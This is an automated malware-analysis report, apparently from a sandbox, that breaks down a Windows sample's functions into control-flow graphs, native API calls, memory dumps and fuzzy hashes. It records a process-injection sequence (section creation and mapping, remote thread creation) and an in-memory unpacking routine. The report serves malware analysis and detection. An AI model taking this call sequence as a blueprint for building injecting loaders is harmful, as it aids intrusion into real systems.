NtMapViewOfSection 219->221 221->218 225 4015e8-4015fe 221->225 222->205 223 401637-401658 NtMapViewOfSection 222->223 223->205 226 40165e-40167a NtMapViewOfSection 223->226 225->218 226->205 228 401680 call 401685 226->228
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2439023319.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_400000_hajefwb.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f1a6a853dab4f549cc320576fe09db09b07e35a282cbb1e4dab32455e86f95e0
                                              • Instruction ID: b303ee40ce3cd715bffe5459f1355022e0f5cf8d3c2eb96fe6471530370b2b0e
                                              • Opcode Fuzzy Hash: f1a6a853dab4f549cc320576fe09db09b07e35a282cbb1e4dab32455e86f95e0
                                              • Instruction Fuzzy Hash: 3BA10872A04204FBEB219F91CC45EEB7BB8EF81710F24452BF902BA1F1D6749902DB65
                                              Function 004014B5 Relevance: 10.7, APIs: 7, Instructions: 180nativeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 231 4014b5-4014f8 240 4014f1-4014f4 231->240 241 4014fb-40150e call 40113b 231->241 240->241 244 401510 241->244 245 401513-401518 241->245 244->245 247 40183d-401845 245->247 248 40151e-40152f 245->248 247->245 251 40184a 247->251 252 401535-40155e 248->252 253 40183b 248->253 254 401861 251->254 255 401852-40185d 251->255 252->253 261 401564-40157b NtDuplicateObject 252->261 253->251 254->255 257 401864-40188e call 40113b 254->257 255->257 261->253 264 401581-4015a5 NtCreateSection 261->264 266 401601-401627 NtCreateSection 264->266 267 4015a7-4015c8 NtMapViewOfSection 264->267 266->253 270 40162d-401631 266->270 267->266 269 4015ca-4015e6 NtMapViewOfSection 267->269 269->266 273 4015e8-4015fe 269->273 270->253 271 401637-401658 NtMapViewOfSection 270->271 271->253 274 40165e-40167a NtMapViewOfSection 271->274 273->266 274->253 276 401680 call 401685 274->276
                                              APIs
                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C3
                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015E1
                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401622
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401653
                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401675
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2439023319.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_400000_hajefwb.jbxd
                                              Similarity
                                              • API ID: Section$View$Create$DuplicateObject
                                              • String ID:
                                              • API String ID: 1546783058-0
                                              • Opcode ID: 719849d05dd569a84f102b076dd352e16165c28b1771b30273656c5f16ef7e6e
                                              • Instruction ID: 19a1d6b0ff796e10bf8f41dee95350edbff68fa9ff5f9bfea876b5d94b6971b3
                                              • Opcode Fuzzy Hash: 719849d05dd569a84f102b076dd352e16165c28b1771b30273656c5f16ef7e6e
                                              • Instruction Fuzzy Hash: C9513BB1900245BFEB209F91CC48FAB7BB8FF85B10F14412AFA11BA2E5D6759941CB64
                                              Function 004014D3 Relevance: 10.7, APIs: 7, Instructions: 169nativeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 279 4014d3-4014eb 281 4014d8-4014f8 279->281 282 4014ed-4014f4 279->282 283 4014fb-40150e call 40113b 281->283 293 4014f1-4014f4 281->293 282->283 289 401510 283->289 290 401513-401518 283->290 289->290 295 40183d-401845 290->295 296 40151e-40152f 290->296 293->283 295->290 299 40184a 295->299 300 401535-40155e 296->300 301 40183b 296->301 302 401861 299->302 303 401852-40185d 299->303 300->301 309 401564-40157b NtDuplicateObject 300->309 301->299 302->303 305 401864-40188e call 40113b 302->305 303->305 309->301 312 401581-4015a5 NtCreateSection 309->312 314 401601-401627 NtCreateSection 312->314 315 4015a7-4015c8 NtMapViewOfSection 312->315 314->301 318 40162d-401631 314->318 315->314 317 4015ca-4015e6 NtMapViewOfSection 315->317 317->314 321 4015e8-4015fe 317->321 318->301 319 401637-401658 NtMapViewOfSection 318->319 319->301 322 40165e-40167a NtMapViewOfSection 319->322 321->314 322->301 324 401680 call 401685 322->324
                                              APIs
                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C3
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2439023319.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_400000_hajefwb.jbxd
                                              Similarity
                                              • API ID: Section$CreateDuplicateObjectView
                                              • String ID:
                                              • API String ID: 1652636561-0
                                              • Opcode ID: b37d7a3f5bcaad5f7e116b16f8babae0ae157dca3b6d02a9ae2d42698eee0e78
                                              • Instruction ID: 8103355e2e942ff69e8c14b284ac6daeef9955d1bae1450e847efa7766c746d9
                                              • Opcode Fuzzy Hash: b37d7a3f5bcaad5f7e116b16f8babae0ae157dca3b6d02a9ae2d42698eee0e78
                                              • Instruction Fuzzy Hash: 245127B1900245BBEF209F91CC48FABBBB8EF86B00F144159FA11BA2A5D6719941CB24
                                              Function 004014F7 Relevance: 10.7, APIs: 7, Instructions: 161nativeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 327 4014f7-40150e call 40113b 331 401510 327->331 332 401513-401518 327->332 331->332 334 40183d-401845 332->334 335 40151e-40152f 332->335 334->332 338 40184a 334->338 339 401535-40155e 335->339 340 40183b 335->340 341 401861 338->341 342 401852-40185d 338->342 339->340 348 401564-40157b NtDuplicateObject 339->348 340->338 341->342 344 401864-40188e call 40113b 341->344 342->344 348->340 351 401581-4015a5 NtCreateSection 348->351 353 401601-401627 NtCreateSection 351->353 354 4015a7-4015c8 NtMapViewOfSection 351->354 353->340 357 40162d-401631 353->357 354->353 356 4015ca-4015e6 NtMapViewOfSection 354->356 356->353 360 4015e8-4015fe 356->360 357->340 358 401637-401658 NtMapViewOfSection 357->358 358->340 361 40165e-40167a NtMapViewOfSection 358->361 360->353 361->340 363 401680 call 401685 361->363
                                              APIs
                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C3
                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015E1
                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401622
                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401653
                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401675
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2439023319.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_400000_hajefwb.jbxd
                                              Similarity
                                              • API ID: Section$View$Create$DuplicateObject
                                              • String ID:
                                              • API String ID: 1546783058-0
                                              • Opcode ID: f4d7e0ef1ba092f52e3f3aa053b09444c5da80675db222bfe35b70c903d8b2e5
                                              • Instruction ID: 2227e086d9928dda04f460d80950503c889386f6503bf0ca9f5f85cfbacfc3af
                                              • Opcode Fuzzy Hash: f4d7e0ef1ba092f52e3f3aa053b09444c5da80675db222bfe35b70c903d8b2e5
                                              • Instruction Fuzzy Hash: 8B5107B1900249BFEF209F91CC48FAFBBB8EF85B10F144159FA11BA2A5D6719945CB24
                                              Function 00402F8F Relevance: 3.2, APIs: 2, Instructions: 168nativethreadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 367 402f8f-402fb3 368 4030d2-4030d7 367->368 369 402fb9-402fd1 367->369 369->368 370 402fd7-402fe8 369->370 371 402fea-402ff3 370->371 372 402ff8-403006 371->372 372->372 373 403008-40300f 372->373 374 403031-403038 373->374 375 403011-403030 373->375 376 40305a-40305d 374->376 377 40303a-403059 374->377 375->374 378 403066 376->378 379 40305f-403062 376->379 377->376 378->371 381 403068-40306d 378->381 379->378 380 403064 379->380 380->381 381->368 382 40306f-403072 381->382 382->368 383 403074-4030cf RtlCreateUserThread NtTerminateProcess 382->383 383->368
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2439023319.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_400000_hajefwb.jbxd
                                              Similarity
                                              • API ID: CreateProcessTerminateThreadUser
                                              • String ID:
                                              • API String ID: 1921587553-0
                                              • Opcode ID: 3666794f6f76943507f515948c416729d2a122008cd61b3dc3cfc1699990bb7a
                                              • Instruction ID: aa2530698c6aa4494656ae1f9c01ee64b6dc24c6198c14284b052c109098bfb9
                                              • Opcode Fuzzy Hash: 3666794f6f76943507f515948c416729d2a122008cd61b3dc3cfc1699990bb7a
                                              • Instruction Fuzzy Hash: 1F415832618E0C4FD778EE6CA88966377D5E794351B56437AE809D3388EE30DC5183C5
                                              Function 0088003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 70 88003c-880047 71 880049 70->71 72 88004c-880263 call 880a3f call 880e0f call 880d90 VirtualAlloc 70->72 71->72 87 88028b-880292 72->87 88 880265-880289 call 880a69 72->88 89 8802a1-8802b0 87->89 91 8802ce-8803c2 VirtualProtect call 880cce call 880ce7 88->91 89->91 92 8802b2-8802cc 89->92 99 8803d1-8803e0 91->99 92->89 100 880439-8804b8 VirtualFree 99->100 101 8803e2-880437 call 880ce7 99->101 103 8804be-8804cd 100->103 104 8805f4-8805fe 100->104 101->99 108 8804d3-8804dd 103->108 105 88077f-880789 104->105 106 880604-88060d 104->106 110 88078b-8807a3 105->110 111 8807a6-8807b0 105->111 106->105 112 880613-880637 106->112 108->104 109 8804e3-880505 108->109 121 880517-880520 109->121 122 880507-880515 109->122 110->111 114 88086e-8808be LoadLibraryA 111->114 115 8807b6-8807cb 111->115 116 88063e-880648 112->116 120 8808c7-8808f9 114->120 118 8807d2-8807d5 115->118 116->105 119 88064e-88065a 116->119 123 880824-880833 118->123 124 8807d7-8807e0 118->124 119->105 125 880660-88066a 119->125 126 8808fb-880901 120->126 127 880902-88091d 120->127 128 880526-880547 121->128 122->128 132 880839-88083c 123->132 129 8807e2 124->129 130 8807e4-880822 124->130 131 88067a-880689 125->131 126->127 133 88054d-880550 128->133 129->123 130->118 134 88068f-8806b2 131->134 135 880750-88077a 131->135 132->114 136 88083e-880847 132->136 138 8805e0-8805ef 133->138 139 880556-88056b 133->139 140 8806ef-8806fc 134->140 141 8806b4-8806ed 134->141 135->116 142 880849 136->142 143 88084b-88086c 136->143 138->108 144 88056d 139->144 145 88056f-88057a 139->145 146 88074b 140->146 147 8806fe-880748 140->147 141->140 142->114 143->132 144->138 148 88059b-8805bb 145->148 149 88057c-880599 145->149 146->131 147->146 154 8805bd-8805db 148->154 149->154 154->133
                                              APIs
                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0088024D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2439322888.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_880000_hajefwb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID: cess$kernel32.dll
                                              • API String ID: 4275171209-1230238691
                                              • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                              • Instruction ID: aac36b1d1735d88017c5ffbfa41392513043c77e30cf763340a148cb817e5263
                                              • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                              • Instruction Fuzzy Hash: 3D527974A01229DFDBA4DF58C984BA8BBB1BF09304F1480D9E50DAB351DB30AE88DF15
                                              Function 0041E420 Relevance: 4.6, APIs: 3, Instructions: 60librarymemoryloaderCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 366 41e420-41e55e GetModuleHandleW GetProcAddress VirtualProtect
                                              APIs
                                              • GetModuleHandleW.KERNEL32(007FBE70), ref: 0041E4FC
                                              • GetProcAddress.KERNEL32(00000000,00428568), ref: 0041E539
                                              • VirtualProtect.KERNELBASE(007FBCB4,007FBE6C,00000040,?), ref: 0041E559
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2439046439.0000000000411000.00000020.00000001.01000000.00000006.sdmp, Offset: 00411000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_411000_hajefwb.jbxd
                                              Similarity
                                              • API ID: AddressHandleModuleProcProtectVirtual
                                              • String ID:
                                              • API String ID: 2099061454-0
                                              • Opcode ID: 5f792d3185b1dfe27c01431423dd3fc6cfa42d126e08d48e723e3642774d761e
                                              • Instruction ID: 73f69d7917680131017885dec632b363507af7a99e12a31d1a756d0ae7194df9
                                              • Opcode Fuzzy Hash: 5f792d3185b1dfe27c01431423dd3fc6cfa42d126e08d48e723e3642774d761e
                                              • Instruction Fuzzy Hash: D331E2107197C0EAE311DB74FC0476A3BA2AB65744F94906CD284873B1DBFE4596C72E
                                              Function 00AAB648 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 384 aab648-aab661 385 aab663-aab665 384->385 386 aab66c-aab678 CreateToolhelp32Snapshot 385->386 387 aab667 385->387 388 aab67a-aab680 386->388 389 aab688-aab695 Module32First 386->389 387->386 388->389 395 aab682-aab686 388->395 390 aab69e-aab6a6 389->390 391 aab697-aab698 call aab307 389->391 396 aab69d 391->396 395->385 395->389 396->390
                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00AAB670
                                              • Module32First.KERNEL32(00000000,00000224), ref: 00AAB690
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2439682112.0000000000AA8000.00000040.00000020.00020000.00000000.sdmp, Offset: 00AA8000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_aa8000_hajefwb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                              • String ID:
                                              • API String ID: 3833638111-0
                                              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                              • Instruction ID: bebd2c28b1bbf3d5eb1a18067a6ee4456d08a9684e221c2b2eda9c21646dd92d
                                              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                              • Instruction Fuzzy Hash: 44F09032210714AFD7203BF9AD8DB7EBAE8AF4A725F140529F646924C2DB70EC454A71
                                              Function 00880E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 397 880e0f-880e24 SetErrorMode * 2 398 880e2b-880e2c 397->398 399 880e26 397->399 399->398
                                              APIs
                                              • SetErrorMode.KERNELBASE(00000400,?,?,00880223,?,?), ref: 00880E19
                                              • SetErrorMode.KERNELBASE(00000000,?,?,00880223,?,?), ref: 00880E1E
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2439322888.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_880000_hajefwb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorMode
                                              • String ID:
                                              • API String ID: 2340568224-0
                                              • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                              • Instruction ID: f2f6d8dcacfc00e91535e2c3d4d44eba824c5639ec75f1ad12dbbdf9da4bc129
                                              • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                              • Instruction Fuzzy Hash: D6D0123114512877D7403A94DC09BCE7B1CDF05B62F008411FB0DD9080C770994047E5
                                              Function 0041E560 Relevance: 1.5, APIs: 1, Instructions: 17libraryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 400 41e560-41e5bb LoadLibraryA
                                              APIs
                                              • LoadLibraryA.KERNELBASE(00428568,0041EAA6), ref: 0041E5B5
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2439046439.0000000000411000.00000020.00000001.01000000.00000006.sdmp, Offset: 00411000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_411000_hajefwb.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: a2247281a0317d9ab3f27a11f04892dfecf0f6f02230e8de71191773789cf042
                                              • Instruction ID: 37f511d326cec085d92eed1722e052eb53f2ff336d789c620464cf2e2f778e48
                                              • Opcode Fuzzy Hash: a2247281a0317d9ab3f27a11f04892dfecf0f6f02230e8de71191773789cf042
                                              • Instruction Fuzzy Hash: 41F02E0574F2E0ECE722C77869097483F511722688FC840ED908016663CAAA02DBD73E
                                              Function 00401891 Relevance: 1.3, APIs: 1, Instructions: 58sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • Sleep.KERNELBASE(00001388), ref: 004018E2
                                                • Part of subcall function 004014B5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                • Part of subcall function 004014B5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2439023319.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_400000_hajefwb.jbxd
                                              Similarity
                                              • API ID: CreateDuplicateObjectSectionSleep
                                              • String ID:
                                              • API String ID: 4152845823-0
                                              • Opcode ID: 6c70d353b433dda2f53fd46e2b53eb18a00404936ca24d3f60717acb78d32f73
                                              • Instruction ID: 625976beb622557468fde4da7c406050b614696d38d370b0d4d52ea32007e278
                                              • Opcode Fuzzy Hash: 6c70d353b433dda2f53fd46e2b53eb18a00404936ca24d3f60717acb78d32f73
                                              • Instruction Fuzzy Hash: 2C0192B260C204EBEB002991CC91EBA32299B04350F308133B603790F1D57C8753B36F
                                              Function 004018A9 Relevance: 1.3, APIs: 1, Instructions: 53sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • Sleep.KERNELBASE(00001388), ref: 004018E2
                                                • Part of subcall function 004014B5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                • Part of subcall function 004014B5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2439023319.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_400000_hajefwb.jbxd
                                              Similarity
                                              • API ID: CreateDuplicateObjectSectionSleep
                                              • String ID:
                                              • API String ID: 4152845823-0
                                              • Opcode ID: a0416c7ea6c8b2beaa64009cd037ce3695af2c8d86f7782f0dc7d3fc67dd3c49
                                              • Instruction ID: 01e10882b1c060c9bcf7afaa20a424b8b06e3eaca9db3e31c9d827ddeb5dfa52
                                              • Opcode Fuzzy Hash: a0416c7ea6c8b2beaa64009cd037ce3695af2c8d86f7782f0dc7d3fc67dd3c49
                                              • Instruction Fuzzy Hash: 620178B260C204EBEB042A91CC91EBE2225AB08320F308133B603790F1D67C8753B72F
                                              Function 0040189C Relevance: 1.3, APIs: 1, Instructions: 52sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • Sleep.KERNELBASE(00001388), ref: 004018E2
                                                • Part of subcall function 004014B5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                • Part of subcall function 004014B5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2439023319.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_400000_hajefwb.jbxd
                                              Similarity
                                              • API ID: CreateDuplicateObjectSectionSleep
                                              • String ID:
                                              • API String ID: 4152845823-0
                                              • Opcode ID: 6b9a7ba5e763362e57e967b3ef273788d2906451f38bbd38aba7de38a4ba4a16
                                              • Instruction ID: 091d8ab5f34d30388949969244c388a12b20eca364eb9837eec97541f3976fe9
                                              • Opcode Fuzzy Hash: 6b9a7ba5e763362e57e967b3ef273788d2906451f38bbd38aba7de38a4ba4a16
                                              • Instruction Fuzzy Hash: 46015AB360C244EBEB016A90C8A1EAA37659B48310F308577B643790F1D67C8753A72F
                                              Function 004018B1 Relevance: 1.3, APIs: 1, Instructions: 52sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • Sleep.KERNELBASE(00001388), ref: 004018E2
                                                • Part of subcall function 004014B5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                • Part of subcall function 004014B5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2439023319.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_400000_hajefwb.jbxd
                                              Similarity
                                              • API ID: CreateDuplicateObjectSectionSleep
                                              • String ID:
                                              • API String ID: 4152845823-0
                                              • Opcode ID: b76e6f8ea108e6f900b2be892df91fc6f607bea987df0946b9f50da5a95319bc
                                              • Instruction ID: 35dd9e0e0d775fbf54de8accc2db9d3c4b904cb042cfc7da377ce8c3fe766ee0
                                              • Opcode Fuzzy Hash: b76e6f8ea108e6f900b2be892df91fc6f607bea987df0946b9f50da5a95319bc
                                              • Instruction Fuzzy Hash: 5501A2B6208244EBDB015AA4CD52AEE37259B04320F244177FA13BA0F1DA7CC653E76F
                                              Function 00AAB307 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00AAB358
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2439682112.0000000000AA8000.00000040.00000020.00020000.00000000.sdmp, Offset: 00AA8000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_aa8000_hajefwb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                              • Instruction ID: 596253a33b9b6ca1368fa21a2bb63405e88f6226c26fd1266a3fbae664e429ed
                                              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                              • Instruction Fuzzy Hash: 02113C79A00208EFDB01DF98CA85E98BBF5AF08350F058094F9489B362D371EA50DF90
                                              Function 004018D0 Relevance: 1.3, APIs: 1, Instructions: 43sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • Sleep.KERNELBASE(00001388), ref: 004018E2
                                                • Part of subcall function 004014B5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401573
                                                • Part of subcall function 004014B5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015A0
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2439023319.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_400000_hajefwb.jbxd
                                              Similarity
                                              • API ID: CreateDuplicateObjectSectionSleep
                                              • String ID:
                                              • API String ID: 4152845823-0
                                              • Opcode ID: b859de65e3e4eca09ea0fa0fd0a149a7b7b601be189d05055e302c384b2899de
                                              • Instruction ID: 66a051fc3b1640109372302853407978bf892c336f6e5febd052736601f380b8
                                              • Opcode Fuzzy Hash: b859de65e3e4eca09ea0fa0fd0a149a7b7b601be189d05055e302c384b2899de
                                              • Instruction Fuzzy Hash: DBF04FB6208244EBDB006AD1CC51EAE33699B49364F304173B613790F5D67C8653E72F

                                              Non-executed Functions

                                              Function 0041E640 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54COMMON
                                              Download Yara Rule
                                              APIs
                                              • EndUpdateResourceA.KERNEL32(00000000,00000000,0042204C), ref: 0041E669
                                              • GetNumaHighestNodeNumber.KERNEL32(00000000), ref: 0041E6C0
                                              • GetComputerNameA.KERNEL32(?,?), ref: 0041E6D0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2439046439.0000000000411000.00000020.00000001.01000000.00000006.sdmp, Offset: 00411000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_411000_hajefwb.jbxd
                                              Similarity
                                              • API ID: ComputerHighestNameNodeNumaNumberResourceUpdate
                                              • String ID: <
                                              • API String ID: 2454257732-4251816714
                                              • Opcode ID: 38b6396692d561f846e82d484e43ff9839e86d75bee0adaba9c0cd9ffd17fbac
                                              • Instruction ID: 1831bf02aaf20b182b31ea32c56b48fe0af4060d55c8b6986e8c7cbcbf37122f
                                              • Opcode Fuzzy Hash: 38b6396692d561f846e82d484e43ff9839e86d75bee0adaba9c0cd9ffd17fbac
                                              • Instruction Fuzzy Hash: 9A118FB51043419FD320DF25D984BABB7E4FF98314FC18D2DF6944A281C778958ACB9A
                                              Function 0041F660 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2439046439.0000000000411000.00000020.00000001.01000000.00000006.sdmp, Offset: 00411000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_411000_hajefwb.jbxd
                                              Similarity
                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                              • String ID:
                                              • API String ID: 3016257755-0
                                              • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                              • Instruction ID: ae9c123fa49f40dbb681c5afc6ce5ec73cb2cd7577c926c04dcfacae745abae9
                                              • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                              • Instruction Fuzzy Hash: D411407210014ABBCF125E85DC42CEE3F62BB18354B598526FE1859131D33ACAB7AB89
                                              Function 0041E710 Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0041E600: GetStartupInfoA.KERNEL32(00000000), ref: 0041E617
                                                • Part of subcall function 0041E600: GetModuleHandleA.KERNEL32(00000000), ref: 0041E61F
                                              • GetEnvironmentStringsW.KERNEL32(00000000), ref: 0041E749
                                              • FindFirstVolumeW.KERNEL32(00000000,00000000), ref: 0041E753
                                              • GetShortPathNameW.KERNEL32(0042333C,?,00000000), ref: 0041E765
                                              • DeleteVolumeMountPointA.KERNEL32(00000000), ref: 0041E784
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2439046439.0000000000411000.00000020.00000001.01000000.00000006.sdmp, Offset: 00411000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_411000_hajefwb.jbxd
                                              Similarity
                                              • API ID: Volume$DeleteEnvironmentFindFirstHandleInfoModuleMountNamePathPointShortStartupStrings
                                              • String ID:
                                              • API String ID: 3566876605-0
